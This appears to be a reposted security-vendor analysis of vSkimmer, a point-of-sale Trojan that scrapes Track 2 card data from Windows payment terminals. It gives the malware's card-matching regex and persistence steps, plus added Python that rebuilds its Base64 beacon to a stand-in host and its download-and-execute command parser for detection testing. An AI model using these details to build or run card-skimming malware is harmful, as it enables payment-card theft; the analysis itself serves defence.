
Monday, April 8, 2013

VSkimmer Botnet Targets Credit Card Payment Terminals


Chintan Shah

While monitoring a Russian underground forum recently, we came across a discussion about a Trojan for sale that can steal credit card information from Windows machines used for financial transactions and credit card payments. The malware, vSkimmer, can detect the card readers, grab all the information from the Windows machines attached to these readers, and send that information to a control server. The author of the thread also discusses other capabilities of this malware, which appears to be a successor of Dexter, but with additional functions.

[Screenshot: chintan1]

[Screenshot: chintan2]

We already know about botnets such as Zeus and SpyEye, which perform financial fraud using extremely sophisticated techniques, including intercepting the victims' banking transactions. VSkimmer is another example of how financial fraud is actively evolving and how financial Trojans are developed and passed around in the underground community. This botnet is particularly interesting because it directly targets card-payment terminals running Windows.
Our Automated Botnet Replication Framework first saw this Trojan on February 13. We have analyzed samples of this malware and worked out how it steals the credit card information and what additional control functions it has. While performing API tracing, we found it uses fairly standard anti-debugging techniques:

[Screenshot: chintan3]


The malware collects the following information from the infected machine and sends it to the control server:

  • Machine GUID from the Registry
  • Locale info
  • Username
  • Hostname
  • OS version

[Screenshot: chintan4]

This malware uses a standard installation mechanism: it copies itself as svchost.exe into %APPDATA%, modifies a registry key to add itself to the list of authorized (auto-started) applications, and calls ShellExecute to launch the new copy. If the Internet is not accessible, vSkimmer waits for a USB device with the volume name KARTOXA007 to be connected to the infected machine and copies all the logs (file name dumz.log), together with the card data collected from the victim, to the USB drive.

[Screenshot: chintan5]

I checked by disconnecting from the Internet: the malware enumerated all the drives and created the file dumz.log on the drive with that volume name.

[Screenshot: chintan6]

Extracting credit card information

VSkimmer maintains a whitelist of processes, which it skips while enumerating the running processes on the infected machine.

[Screenshot: chintan7]

For every running process not on the whitelist, vSkimmer calls OpenProcess and ReadProcessMemory to read the process's memory pages and runs a pattern-matching routine over them with the regular expression `?[3-9]{1}[0-9]{12,19}[D=\u0061][0-9]{10,30}\??` to extract the card data read by the payment devices. It repeats this for each non-whitelisted process on the infected machine.

[Screenshot: chintan8]

VSkimmer control

Before communicating with the control server, the malware Base64-encodes all the machine information it collected and appends it to the URI. The encoded string has this format:

  • machine guid|build_id|bot_version|Windows_version|Host_name|User_Name

[Screenshot: chintan9]


Next, vSkimmer creates the HTTP request and connects to the control server:

[Screenshot: chintan10]

While this malware ran, we saw the following response. Note that the commands are enclosed in a <cmd>...</cmd> tag.

[Screenshot: chintan11]


Once vSkimmer receives the response from the server, it executes the following routine to parse the command:

[Screenshot: chintan12]


Because the response from the server during our run was <cmd>null</cmd>, the malware extracts the 3-byte command and tries to match it against the commands it implements. First it checks whether the command from the server is "dlx."

[Screenshot: chintan13]

If not, vSkimmer checks for the "upd" command. These commands implement HTTP download-and-execute ("dlx") and an update of the bot ("upd"), respectively.
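As an added example (not code from the original post and not the malware's own), the following Python reconstructs the two protocol details described above so that a defender can test a proxy-log check against them: the Base64-encoded, pipe-delimited beacon string carried in the request URI, and the <cmd>...</cmd> response whose first three bytes are compared with the "dlx" and "upd" opcodes. The URI layout (the blob being the whole request path), the 8-4-4-4-12 form of the first field, and the "opcode followed by an argument" layout of a dlx command are assumptions; all sample values are constructed.

```python
import base64
import re
from urllib.parse import urlsplit

# Field order of the beacon string, as given in the post.
FIELDS = ("machine_guid", "build_id", "bot_version",
          "windows_version", "host_name", "user_name")
# Assumption: the first field is the Windows MachineGuid in its usual 8-4-4-4-12 form.
GUID_RE = re.compile(r"^[0-9a-f]{8}(-[0-9a-f]{4}){3}-[0-9a-f]{12}$", re.I)
CMD_RE = re.compile(r"<cmd>(.*?)</cmd>", re.S)
# The two 3-byte opcodes the post describes.
OPCODES = {"dlx": "download and execute", "upd": "update bot"}


def build_beacon(c2_base, guid, build_id, bot_version, win_version, host, user):
    """Bot side: join the fields with "|", Base64 the result, append it to the URI.
    Assumption: the blob is the whole request path under the C2 base URL."""
    raw = "|".join((guid, build_id, bot_version, win_version, host, user))
    return c2_base.rstrip("/") + "/" + base64.b64encode(raw.encode()).decode()


def decode_beacon(uri):
    """Defender side: does this URI carry a vSkimmer-style beacon?
    Returns the decoded fields, or None when the path is not such a blob."""
    blob = urlsplit(uri).path.lstrip("/")
    try:
        padded = blob + "=" * (-len(blob) % 4)      # tolerate stripped padding
        raw = base64.b64decode(padded, validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):       # binascii.Error is a ValueError
        return None
    parts = raw.split("|")
    if len(parts) != len(FIELDS) or not GUID_RE.match(parts[0]):
        return None
    return dict(zip(FIELDS, parts))


def parse_command(body):
    """Bot side: take the text inside <cmd>...</cmd> and compare its first three
    bytes with the known opcodes. "null" (what the post observed) matches nothing.
    Assumption: anything after the opcode is its argument, e.g. a download URL."""
    m = CMD_RE.search(body)
    if not m:
        return None
    text = m.group(1).strip()
    op = text[:3]
    if op not in OPCODES:
        return None
    return op, text[3:].strip()


# Constructed sample values (not observed indicators).
SAMPLE_GUID = "12345678-1234-1234-1234-123456789abc"
SAMPLE_URI = build_beacon("http://c2.example", SAMPLE_GUID,
                          "1", "1.0", "5.1", "POS-01", "cashier")

if __name__ == "__main__":
    print(SAMPLE_URI)
    print(decode_beacon(SAMPLE_URI))
    print(parse_command("<cmd>null</cmd>"))
    print(parse_command("<cmd>dlx http://c2.example/update.exe</cmd>"))
```

The decoder is deliberately strict (full Base64 validation, exactly six fields, a GUID in the first slot) because a check that merely looks for "a Base64 path" will fire on half the CDN traffic in a proxy log; the beacon format itself is the distinguishing feature.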
As we saw earlier in this post, vSkimmer grabs the Track 2 data stored on the magnetic stripe of credit cards. This track holds the card's key data, including the card number. (You can read more about the Track 2 data format on Wikipedia.) The main fields:
  • Primary Account Number: the number printed on the front of the card
  • Expiration Date
  • Service Code: a three-digit number

VSkimmer bot control panel

Here is a look at the control panel of the command server:

[Screenshot: chintan14]

[Screenshot: chintan15]

VSkimmer demonstrates the great interest of cyber crime in the payments sector. Institutions have already been attacked in the past by malicious code such as Zeus and SpyEye, and this case is just "another example of how financial fraud is actively evolving and how financial Trojans are developed and passed around in the underground community. This botnet is particularly interesting because it directly targets card-payment terminals running Windows," Shah explained in his post. I find it really interesting that the offer of similar malware in the underground is increasing and that its sales model is reaching a level of excellence never seen before ... we face difficult times.
